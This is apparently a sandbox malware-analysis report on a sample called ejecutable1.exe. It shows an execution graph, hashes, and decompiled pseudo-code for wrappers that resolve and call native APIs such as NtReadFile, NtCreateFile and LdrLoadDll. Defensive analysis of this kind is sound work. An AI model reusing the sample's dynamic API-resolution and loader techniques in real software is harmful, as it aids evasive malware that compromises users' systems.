                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: acf508d11d8bbf84cd9e402a8487780760cf56a53e1bf3e50cda1f318127ffee
                                                                    • Instruction ID: ba9704f5e3722afce020d9ce472f7e046c46a9bb595fd7c23a5922b820980fe6
                                                                    • Opcode Fuzzy Hash: acf508d11d8bbf84cd9e402a8487780760cf56a53e1bf3e50cda1f318127ffee
                                                                    • Instruction Fuzzy Hash: C7418F71D057588BEB1DCF6B8C0069AFAF7AFC9300F18C0BA840CAA265DB340A46CF55
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00DA0048, Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d86e9313418966a9ae2e090c12fd05b4454a432ab35c3a51c078d288735489a5
                                                                    • Instruction ID: f16723d9ff5c0a1548a49ad0f7a03007ef4baecb115d4dfffb418e9267f8de26
                                                                    • Opcode Fuzzy Hash: d86e9313418966a9ae2e090c12fd05b4454a432ab35c3a51c078d288735489a5
                                                                    • Instruction Fuzzy Hash: D9415F71E057188BEB1CCF6B8D4179AFAF7AFC9300F14C1BA840CAA255DB7446818F51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Analysis Process: ejecutable1.exe PID: 2656 Parent PID: 788 ejecutable1.exeCOMMON

                                                                    Execution Graph

                                                                    Execution Coverage:4%
                                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                                    Signature Coverage:6%
                                                                    Total number of Nodes:584
                                                                    Total number of Limit Nodes:71

                                                                    Graph

                                                                    execution_graph 34249 41d470 34252 419be0 34249->34252 34253 419c06 34252->34253 34264 408b50 34253->34264 34255 419c12 34256 419c59 34255->34256 34272 40d160 34255->34272 34258 419c27 34259 419c3c 34258->34259 34320 418920 34258->34320 34284 40a600 34259->34284 34262 419c4b 34263 418920 2 API calls 34262->34263 34263->34256 34267 408b5d 34264->34267 34323 408aa0 34264->34323 34266 408b64 34266->34255 34267->34266 34335 408a40 34267->34335 34273 40d18c 34272->34273 34752 40a000 34273->34752 34275 40d19e 34756 40d070 34275->34756 34278 40d1d1 34281 40d1e2 34278->34281 34283 418700 2 API calls 34278->34283 34279 40d1b9 34280 40d1c4 34279->34280 34282 418700 2 API calls 34279->34282 34280->34258 34281->34258 34282->34280 34283->34281 34285 40a625 34284->34285 34286 40a000 LdrLoadDll 34285->34286 34287 40a67c 34286->34287 34775 409c80 34287->34775 34289 40a8f3 34289->34262 34290 40a6a2 34290->34289 34784 413390 34290->34784 34292 40a6e7 34292->34289 34787 4079d0 34292->34787 34294 40a72b 34294->34289 34794 418770 34294->34794 34298 40a781 34299 40a788 34298->34299 34806 418280 34298->34806 34300 41a090 2 API calls 34299->34300 34303 40a795 34300->34303 34303->34262 34304 40a7d2 34305 41a090 2 API calls 34304->34305 34306 40a7d9 34305->34306 34306->34262 34307 40a7e2 34308 40d1f0 3 API calls 34307->34308 34309 40a856 34308->34309 34309->34299 34310 40a861 34309->34310 34311 41a090 2 API calls 34310->34311 34312 40a885 34311->34312 34811 4182d0 34312->34811 34315 418280 2 API calls 34316 40a8c0 34315->34316 34316->34289 34816 418090 34316->34816 34319 418920 2 API calls 34319->34289 34321 4191d0 LdrLoadDll 34320->34321 34322 41893f ExitProcess 34321->34322 34324 408ab3 34323->34324 34374 416e40 LdrLoadDll 34323->34374 34354 416cf0 34324->34354 34327 408ac6 34327->34267 34328 408abc 34328->34327 34357 419520 34328->34357 34330 408b03 34330->34327 34368 4088c0 34330->34368 34332 408b23 34375 408320 LdrLoadDll 34332->34375 34334 408b35 34334->34267 34725 419810 34335->34725 34338 419810 LdrLoadDll 34339 408a6b 34338->34339 34340 419810 LdrLoadDll 34339->34340 34341 408a81 34340->34341 34342 40cf60 34341->34342 34343 40cf79 34342->34343 34734 409e80 34343->34734 34345 40cf8c 34738 418450 34345->34738 34348 408b75 34348->34255 34350 40cfb2 34353 40cfdd 34350->34353 34745 4184d0 34350->34745 34351 418700 2 API calls 34351->34348 34353->34351 34376 418870 34354->34376 34358 419539 34357->34358 34389 413a40 34358->34389 34360 419551 34361 41955a 34360->34361 34428 419360 34360->34428 34361->34330 34363 41956e 34363->34361 34446 418170 34363->34446 34703 406e20 34368->34703 34370 4088e1 34370->34332 34371 4088da 34371->34370 34716 4070e0 34371->34716 34374->34324 34375->34334 34379 4191d0 34376->34379 34378 416d05 34378->34328 34380 4191e0 34379->34380 34382 419202 34379->34382 34383 413e40 34380->34383 34382->34378 34384 413e5a 34383->34384 34385 413e4e 34383->34385 34384->34382 34385->34384 34388 4142c0 LdrLoadDll 34385->34388 34387 413fac 34387->34382 34388->34387 34390 413d75 34389->34390 34392 413a54 34389->34392 34390->34360 34392->34390 34454 417ec0 34392->34454 34394 413b80 34457 4185d0 34394->34457 34395 413b63 34514 4186d0 LdrLoadDll 34395->34514 34398 413b6d 34398->34360 34399 413ba7 34400 41a090 2 API calls 34399->34400 34402 413bb3 34400->34402 34401 413d39 34404 418700 2 API calls 34401->34404 34402->34398 34402->34401 34403 413d4f 34402->34403 34408 413c42 34402->34408 34523 413780 LdrLoadDll NtReadFile NtClose 34403->34523 34405 413d40 34404->34405 34405->34360 34407 413d62 34407->34360 34409 413ca9 34408->34409 34411 413c51 34408->34411 34409->34401 34410 413cbc 34409->34410 34516 418550 34410->34516 34413 413c56 34411->34413 34414 413c6a 34411->34414 34515 413640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 34413->34515 34417 413c87 34414->34417 34418 413c6f 34414->34418 34417->34405 34472 413400 34417->34472 34460 4136e0 34418->34460 34420 413c60 34420->34360 34422 413d1c 34520 418700 34422->34520 34423 413c7d 34423->34360 34426 413c9f 34426->34360 34427 413d28 34427->34360 34429 419371 34428->34429 34430 419383 34429->34430 34542 41a010 34429->34542 34430->34363 34432 4193a4 34545 413050 34432->34545 34434 4193f0 34434->34363 34435 4193c7 34435->34434 34436 413050 3 API calls 34435->34436 34437 4193e9 34436->34437 34437->34434 34577 414380 34437->34577 34439 41947a 34440 41948a 34439->34440 34671 419170 LdrLoadDll 34439->34671 34587 418fe0 34440->34587 34443 4194b8 34666 418130 34443->34666 34447 41818c 34446->34447 34448 4191d0 LdrLoadDll 34446->34448 34699 88fae8 LdrInitializeThunk 34447->34699 34448->34447 34449 4181a7 34451 41a090 34449->34451 34452 4195c9 34451->34452 34700 4188e0 34451->34700 34452->34330 34455 4191d0 LdrLoadDll 34454->34455 34456 413b34 34455->34456 34456->34394 34456->34395 34456->34398 34458 4191d0 LdrLoadDll 34457->34458 34459 4185ec NtCreateFile 34458->34459 34459->34399 34461 4136fc 34460->34461 34462 418550 LdrLoadDll 34461->34462 34463 41371d 34462->34463 34464 413724 34463->34464 34465 413738 34463->34465 34466 418700 2 API calls 34464->34466 34467 418700 2 API calls 34465->34467 34468 41372d 34466->34468 34469 413741 34467->34469 34468->34423 34524 41a2a0 LdrLoadDll RtlAllocateHeap 34469->34524 34471 41374c 34471->34423 34473 41344b 34472->34473 34474 41347e 34472->34474 34476 418550 LdrLoadDll 34473->34476 34475 4135c9 34474->34475 34480 41349a 34474->34480 34477 418550 LdrLoadDll 34475->34477 34478 413466 34476->34478 34484 4135e4 34477->34484 34479 418700 2 API calls 34478->34479 34481 41346f 34479->34481 34482 418550 LdrLoadDll 34480->34482 34481->34426 34483 4134b5 34482->34483 34486 4134d1 34483->34486 34487 4134bc 34483->34487 34538 418590 LdrLoadDll 34484->34538 34490 4134d6 34486->34490 34491 4134ec 34486->34491 34489 418700 2 API calls 34487->34489 34488 41361e 34492 418700 2 API calls 34488->34492 34493 4134c5 34489->34493 34494 418700 2 API calls 34490->34494 34499 4134f1 34491->34499 34525 41a260 34491->34525 34495 413629 34492->34495 34493->34426 34496 4134df 34494->34496 34495->34426 34496->34426 34507 413503 34499->34507 34529 418680 34499->34529 34500 413557 34501 41356e 34500->34501 34537 418510 LdrLoadDll 34500->34537 34502 413575 34501->34502 34503 41358a 34501->34503 34505 418700 2 API calls 34502->34505 34506 418700 2 API calls 34503->34506 34505->34507 34508 413593 34506->34508 34507->34426 34509 4135bf 34508->34509 34532 419e60 34508->34532 34509->34426 34511 4135aa 34512 41a090 2 API calls 34511->34512 34513 4135b3 34512->34513 34513->34426 34514->34398 34515->34420 34517 4191d0 LdrLoadDll 34516->34517 34518 413d04 34517->34518 34519 418590 LdrLoadDll 34518->34519 34519->34422 34521 41871c NtClose 34520->34521 34522 4191d0 LdrLoadDll 34520->34522 34521->34427 34522->34521 34523->34407 34524->34471 34526 41a263 34525->34526 34539 4188a0 34526->34539 34528 41a278 34528->34499 34530 4191d0 LdrLoadDll 34529->34530 34531 41869c NtReadFile 34530->34531 34531->34500 34533 419e84 34532->34533 34534 419e6d 34532->34534 34533->34511 34534->34533 34535 41a260 2 API calls 34534->34535 34536 419e9b 34535->34536 34536->34511 34537->34501 34538->34488 34540 4191d0 LdrLoadDll 34539->34540 34541 4188bc RtlAllocateHeap 34540->34541 34541->34528 34543 41a03d 34542->34543 34672 4187b0 34542->34672 34543->34432 34546 413061 34545->34546 34547 413069 34545->34547 34546->34435 34548 4130bd 34547->34548 34576 41333c 34547->34576 34675 41b240 34547->34675 34550 41b240 2 API calls 34548->34550 34553 4130c8 34550->34553 34551 413116 34554 41b240 2 API calls 34551->34554 34553->34551 34555 41b370 3 API calls 34553->34555 34686 41b2e0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 34553->34686 34557 41312a 34554->34557 34555->34553 34556 413187 34558 41b240 2 API calls 34556->34558 34557->34556 34680 41b370 34557->34680 34560 41319d 34558->34560 34561 4131da 34560->34561 34564 41b370 3 API calls 34560->34564 34562 41b240 2 API calls 34561->34562 34563 4131e5 34562->34563 34565 41321f 34563->34565 34566 41b370 3 API calls 34563->34566 34564->34560 34687 41b2a0 LdrLoadDll RtlFreeHeap 34565->34687 34566->34563 34568 413314 34688 41b2a0 LdrLoadDll RtlFreeHeap 34568->34688 34570 41331e 34689 41b2a0 LdrLoadDll RtlFreeHeap 34570->34689 34572 413328 34690 41b2a0 LdrLoadDll RtlFreeHeap 34572->34690 34574 413332 34691 41b2a0 LdrLoadDll RtlFreeHeap 34574->34691 34576->34435 34578 414391 34577->34578 34579 413a40 8 API calls 34578->34579 34581 4143a7 34579->34581 34580 4143fa 34580->34439 34581->34580 34582 4143e2 34581->34582 34583 4143f5 34581->34583 34584 41a090 2 API calls 34582->34584 34585 41a090 2 API calls 34583->34585 34586 4143e7 34584->34586 34585->34580 34586->34439 34588 418ff4 34587->34588 34589 418ea0 LdrLoadDll 34587->34589 34692 418ea0 34588->34692 34589->34588 34591 418ffd 34592 418ea0 LdrLoadDll 34591->34592 34593 419006 34592->34593 34594 418ea0 LdrLoadDll 34593->34594 34595 41900f 34594->34595 34596 418ea0 LdrLoadDll 34595->34596 34597 419018 34596->34597 34598 418ea0 LdrLoadDll 34597->34598 34599 419021 34598->34599 34600 418ea0 LdrLoadDll 34599->34600 34601 41902d 34600->34601 34602 418ea0 LdrLoadDll 34601->34602 34603 419036 34602->34603 34604 418ea0 LdrLoadDll 34603->34604 34605 41903f 34604->34605 34606 418ea0 LdrLoadDll 34605->34606 34607 419048 34606->34607 34608 418ea0 LdrLoadDll 34607->34608 34609 419051 34608->34609 34610 418ea0 LdrLoadDll 34609->34610 34611 41905a 34610->34611 34612 418ea0 LdrLoadDll 34611->34612 34613 419066 34612->34613 34614 418ea0 LdrLoadDll 34613->34614 34615 41906f 34614->34615 34616 418ea0 LdrLoadDll 34615->34616 34617 419078 34616->34617 34618 418ea0 LdrLoadDll 34617->34618 34619 419081 34618->34619 34620 418ea0 LdrLoadDll 34619->34620 34621 41908a 34620->34621 34622 418ea0 LdrLoadDll 34621->34622 34623 419093 34622->34623 34624 418ea0 LdrLoadDll 34623->34624 34625 41909f 34624->34625 34626 418ea0 LdrLoadDll 34625->34626 34627 4190a8 34626->34627 34628 418ea0 LdrLoadDll 34627->34628 34629 4190b1 34628->34629 34630 418ea0 LdrLoadDll 34629->34630 34631 4190ba 34630->34631 34632 418ea0 LdrLoadDll 34631->34632 34633 4190c3 34632->34633 34634 418ea0 LdrLoadDll 34633->34634 34635 4190cc 34634->34635 34636 418ea0 LdrLoadDll 34635->34636 34637 4190d8 34636->34637 34638 418ea0 LdrLoadDll 34637->34638 34639 4190e1 34638->34639 34640 418ea0 LdrLoadDll 34639->34640 34641 4190ea 34640->34641 34642 418ea0 LdrLoadDll 34641->34642 34643 4190f3 34642->34643 34644 418ea0 LdrLoadDll 34643->34644 34645 4190fc 34644->34645 34646 418ea0 LdrLoadDll 34645->34646 34647 419105 34646->34647 34648 418ea0 LdrLoadDll 34647->34648 34649 419111 34648->34649 34650 418ea0 LdrLoadDll 34649->34650 34651 41911a 34650->34651 34652 418ea0 LdrLoadDll 34651->34652 34653 419123 34652->34653 34654 418ea0 LdrLoadDll 34653->34654 34655 41912c 34654->34655 34656 418ea0 LdrLoadDll 34655->34656 34657 419135 34656->34657 34658 418ea0 LdrLoadDll 34657->34658 34659 41913e 34658->34659 34660 418ea0 LdrLoadDll 34659->34660 34661 41914a 34660->34661 34662 418ea0 LdrLoadDll 34661->34662 34663 419153 34662->34663 34664 418ea0 LdrLoadDll 34663->34664 34665 41915c 34664->34665 34665->34443 34667 4191d0 LdrLoadDll 34666->34667 34668 41814c 34667->34668 34698 88fdc0 LdrInitializeThunk 34668->34698 34669 418163 34669->34363 34671->34440 34673 4187cc NtAllocateVirtualMemory 34672->34673 34674 4191d0 LdrLoadDll 34672->34674 34673->34543 34674->34673 34676 41b250 34675->34676 34677 41b256 34675->34677 34676->34548 34678 41a260 2 API calls 34677->34678 34679 41b27c 34678->34679 34679->34548 34681 41b2e0 34680->34681 34682 41a260 2 API calls 34681->34682 34683 41b33d 34681->34683 34684 41b31a 34682->34684 34683->34557 34685 41a090 2 API calls 34684->34685 34685->34683 34686->34553 34687->34568 34688->34570 34689->34572 34690->34574 34691->34576 34693 418ebb 34692->34693 34694 413e40 LdrLoadDll 34693->34694 34695 418edb 34694->34695 34696 413e40 LdrLoadDll 34695->34696 34697 418f87 34695->34697 34696->34697 34697->34591 34697->34697 34698->34669 34699->34449 34701 4188fc RtlFreeHeap 34700->34701 34702 4191d0 LdrLoadDll 34700->34702 34701->34452 34702->34701 34704 406e30 34703->34704 34705 406e2b 34703->34705 34706 41a010 2 API calls 34704->34706 34705->34371 34713 406e55 34706->34713 34707 406eb8 34707->34371 34708 418130 2 API calls 34708->34713 34709 406ebe 34710 406ee4 34709->34710 34712 418830 2 API calls 34709->34712 34710->34371 34714 406ed5 34712->34714 34713->34707 34713->34708 34713->34709 34715 41a010 2 API calls 34713->34715 34719 418830 34713->34719 34714->34371 34715->34713 34717 4070fe 34716->34717 34718 418830 2 API calls 34716->34718 34717->34332 34718->34717 34720 41884c 34719->34720 34721 4191d0 LdrLoadDll 34719->34721 34724 88fb68 LdrInitializeThunk 34720->34724 34721->34720 34722 418863 34722->34713 34724->34722 34726 419833 34725->34726 34729 409b30 34726->34729 34728 408a5a 34728->34338 34731 409b54 34729->34731 34730 409b5b 34730->34728 34731->34730 34732 409b90 LdrLoadDll 34731->34732 34733 409ba7 34731->34733 34732->34733 34733->34728 34736 409ea3 34734->34736 34735 409f20 34735->34345 34736->34735 34750 417f00 LdrLoadDll 34736->34750 34739 4191d0 LdrLoadDll 34738->34739 34740 40cf9b 34739->34740 34740->34348 34741 418a40 34740->34741 34742 418a59 34741->34742 34743 4191d0 LdrLoadDll 34742->34743 34744 418a5f LookupPrivilegeValueW 34743->34744 34744->34350 34746 4191d0 LdrLoadDll 34745->34746 34747 4184ec 34746->34747 34751 88fed0 LdrInitializeThunk 34747->34751 34748 41850b 34748->34353 34750->34735 34751->34748 34753 40a027 34752->34753 34754 409e80 LdrLoadDll 34753->34754 34755 40a056 34754->34755 34755->34275 34757 40d08a 34756->34757 34758 40d140 34756->34758 34759 409e80 LdrLoadDll 34757->34759 34758->34278 34758->34279 34760 40d0ac 34759->34760 34766 4181b0 34760->34766 34762 40d0ee 34769 4181f0 34762->34769 34765 418700 2 API calls 34765->34758 34767 4191d0 LdrLoadDll 34766->34767 34768 4181cc 34767->34768 34768->34762 34770 41820c 34769->34770 34771 4191d0 LdrLoadDll 34769->34771 34774 8907ac LdrInitializeThunk 34770->34774 34771->34770 34772 40d134 34772->34765 34774->34772 34776 409c91 34775->34776 34777 409c8d 34775->34777 34778 409caa 34776->34778 34779 409cdc 34776->34779 34777->34290 34821 417f40 LdrLoadDll 34778->34821 34822 417f40 LdrLoadDll 34779->34822 34781 409ced 34781->34290 34783 409ccc 34783->34290 34785 40d1f0 3 API calls 34784->34785 34786 4133b6 34785->34786 34786->34292 34788 4079e9 34787->34788 34823 407710 34787->34823 34790 407a0d 34788->34790 34791 407710 19 API calls 34788->34791 34790->34294 34792 4079fa 34791->34792 34792->34790 34841 40d460 10 API calls 34792->34841 34795 4191d0 LdrLoadDll 34794->34795 34796 41878c 34795->34796 34960 88fea0 LdrInitializeThunk 34796->34960 34797 40a762 34799 40d1f0 34797->34799 34800 40d20d 34799->34800 34961 418230 34800->34961 34803 40d255 34803->34298 34804 418280 2 API calls 34805 40d27e 34804->34805 34805->34298 34807 41829c 34806->34807 34808 4191d0 LdrLoadDll 34806->34808 34967 88fc60 LdrInitializeThunk 34807->34967 34808->34807 34809 40a7c5 34809->34304 34809->34307 34812 4191d0 LdrLoadDll 34811->34812 34813 4182ec 34812->34813 34968 88fc90 LdrInitializeThunk 34813->34968 34814 40a899 34814->34315 34817 4191d0 LdrLoadDll 34816->34817 34818 4180ac 34817->34818 34969 890078 LdrInitializeThunk 34818->34969 34819 40a8ec 34819->34319 34821->34783 34822->34781 34824 406e20 4 API calls 34823->34824 34839 40772a 34824->34839 34825 4079b9 34825->34788 34826 4079af 34827 4070e0 2 API calls 34826->34827 34827->34825 34830 418170 2 API calls 34830->34839 34832 418700 LdrLoadDll NtClose 34832->34839 34835 40a900 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 34835->34839 34838 418090 2 API calls 34838->34839 34839->34825 34839->34826 34839->34830 34839->34832 34839->34835 34839->34838 34842 417f80 34839->34842 34845 407540 34839->34845 34857 40d340 LdrLoadDll NtClose 34839->34857 34858 418000 LdrLoadDll 34839->34858 34859 418030 LdrLoadDll 34839->34859 34860 4180c0 LdrLoadDll 34839->34860 34861 407310 34839->34861 34877 405ea0 LdrLoadDll 34839->34877 34841->34790 34843 4191d0 LdrLoadDll 34842->34843 34844 417f9c 34843->34844 34844->34839 34846 407556 34845->34846 34878 417af0 34846->34878 34848 4076e1 34848->34839 34849 40756f 34849->34848 34899 407120 34849->34899 34851 407655 34851->34848 34852 407310 11 API calls 34851->34852 34853 407683 34852->34853 34853->34848 34854 418170 2 API calls 34853->34854 34855 4076b8 34854->34855 34855->34848 34856 418770 2 API calls 34855->34856 34856->34848 34857->34839 34858->34839 34859->34839 34860->34839 34862 407339 34861->34862 34939 407280 34862->34939 34864 40734c 34866 418770 2 API calls 34864->34866 34867 4073d7 34864->34867 34869 4073d2 34864->34869 34947 40d3c0 34864->34947 34866->34864 34867->34839 34868 418700 2 API calls 34870 40740a 34868->34870 34869->34868 34870->34867 34871 417f80 LdrLoadDll 34870->34871 34872 40746f 34871->34872 34872->34867 34951 417fc0 34872->34951 34874 4074d3 34874->34867 34875 413a40 8 API calls 34874->34875 34876 407528 34875->34876 34876->34839 34877->34839 34879 41a260 2 API calls 34878->34879 34880 417b07 34879->34880 34906 408160 34880->34906 34882 417b22 34883 417b60 34882->34883 34884 417b49 34882->34884 34887 41a010 2 API calls 34883->34887 34885 41a090 2 API calls 34884->34885 34886 417b56 34885->34886 34886->34849 34888 417b9a 34887->34888 34889 41a010 2 API calls 34888->34889 34890 417bb3 34889->34890 34896 417e54 34890->34896 34912 41a050 34890->34912 34893 417e40 34894 41a090 2 API calls 34893->34894 34895 417e4a 34894->34895 34895->34849 34897 41a090 2 API calls 34896->34897 34898 417ea9 34897->34898 34898->34849 34900 40721f 34899->34900 34901 407135 34899->34901 34900->34851 34901->34900 34902 413a40 8 API calls 34901->34902 34903 4071a2 34902->34903 34904 41a090 2 API calls 34903->34904 34905 4071c9 34903->34905 34904->34905 34905->34851 34907 408185 34906->34907 34908 409b30 LdrLoadDll 34907->34908 34909 4081b8 34908->34909 34911 4081dd 34909->34911 34915 40b330 34909->34915 34911->34882 34933 4187f0 34912->34933 34916 40b35c 34915->34916 34917 418450 LdrLoadDll 34916->34917 34918 40b375 34917->34918 34919 40b37c 34918->34919 34926 418490 34918->34926 34919->34911 34923 40b3b7 34924 418700 2 API calls 34923->34924 34925 40b3da 34924->34925 34925->34911 34927 4184ac 34926->34927 34928 4191d0 LdrLoadDll 34926->34928 34932 88fbb8 LdrInitializeThunk 34927->34932 34928->34927 34929 40b39f 34929->34919 34931 418a80 LdrLoadDll 34929->34931 34931->34923 34932->34929 34934 4191d0 LdrLoadDll 34933->34934 34935 41880c 34934->34935 34938 890048 LdrInitializeThunk 34935->34938 34936 417e39 34936->34893 34936->34896 34938->34936 34940 407298 34939->34940 34941 409b30 LdrLoadDll 34940->34941 34942 4072b3 34941->34942 34943 413e40 LdrLoadDll 34942->34943 34944 4072c3 34943->34944 34945 4072cc PostThreadMessageW 34944->34945 34946 4072e0 34944->34946 34945->34946 34946->34864 34948 40d3d3 34947->34948 34954 418100 34948->34954 34952 4191d0 LdrLoadDll 34951->34952 34953 417fdc 34952->34953 34953->34874 34955 41811c 34954->34955 34956 4191d0 LdrLoadDll 34954->34956 34959 88fd8c LdrInitializeThunk 34955->34959 34956->34955 34957 40d3fe 34957->34864 34959->34957 34960->34797 34962 4191d0 LdrLoadDll 34961->34962 34963 41824c 34962->34963 34966 88ffb4 LdrInitializeThunk 34963->34966 34964 40d24e 34964->34803 34964->34804 34966->34964 34967->34809 34968->34814 34969->34819 34972 88f900 LdrInitializeThunk

                                                                    Executed Functions

                                                                    Function 00418680, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 418680-4186c9 call 4191d0 NtReadFile
                                                                    C-Code - Quality: 37%
                                                                    			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                    0x00418683
                                                                    0x0041868f
                                                                    0x00418697
                                                                    0x0041869c
                                                                    0x004186a2
                                                                    0x004186bd
                                                                    0x004186c5
                                                                    0x004186c9

                                                                    APIs
                                                                    • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:A$b=A$b=A
                                                                    • API String ID: 2738559852-704622139
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 278 409b30-409b59 call 41af60 281 409b5b-409b5e 278->281 282 409b5f-409b6d call 41b380 278->282 285 409b7d-409b8e call 419710 282->285 286 409b6f-409b7a call 41b600 282->286 291 409b90-409ba4 LdrLoadDll 285->291 292 409ba7-409baa 285->292 286->285 291->292
                                                                    C-Code - Quality: 100%
                                                                    			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60(_a8,  &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                    0x00409b4c
                                                                    0x00409b4f
                                                                    0x00409b54
                                                                    0x00409b59
                                                                    0x00409b63
                                                                    0x00409b68
                                                                    0x00409b6b
                                                                    0x00409b6d
                                                                    0x00409b75
                                                                    0x00409b7a
                                                                    0x00409b7a
                                                                    0x00409b81
                                                                    0x00409b89
                                                                    0x00409b8c
                                                                    0x00409b8e
                                                                    0x00409ba2
                                                                    0x00000000
                                                                    0x00409ba4
                                                                    0x00409baa
                                                                    0x00409b5e
                                                                    0x00409b5e
                                                                    0x00409b5e

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                                    • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                    • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 293 4185d0-418621 call 4191d0 NtCreateFile
                                                                    C-Code - Quality: 100%
                                                                    			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                    0x004185df
                                                                    0x004185e7
                                                                    0x0041861d
                                                                    0x00418621

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442254980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_ejecutable1.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
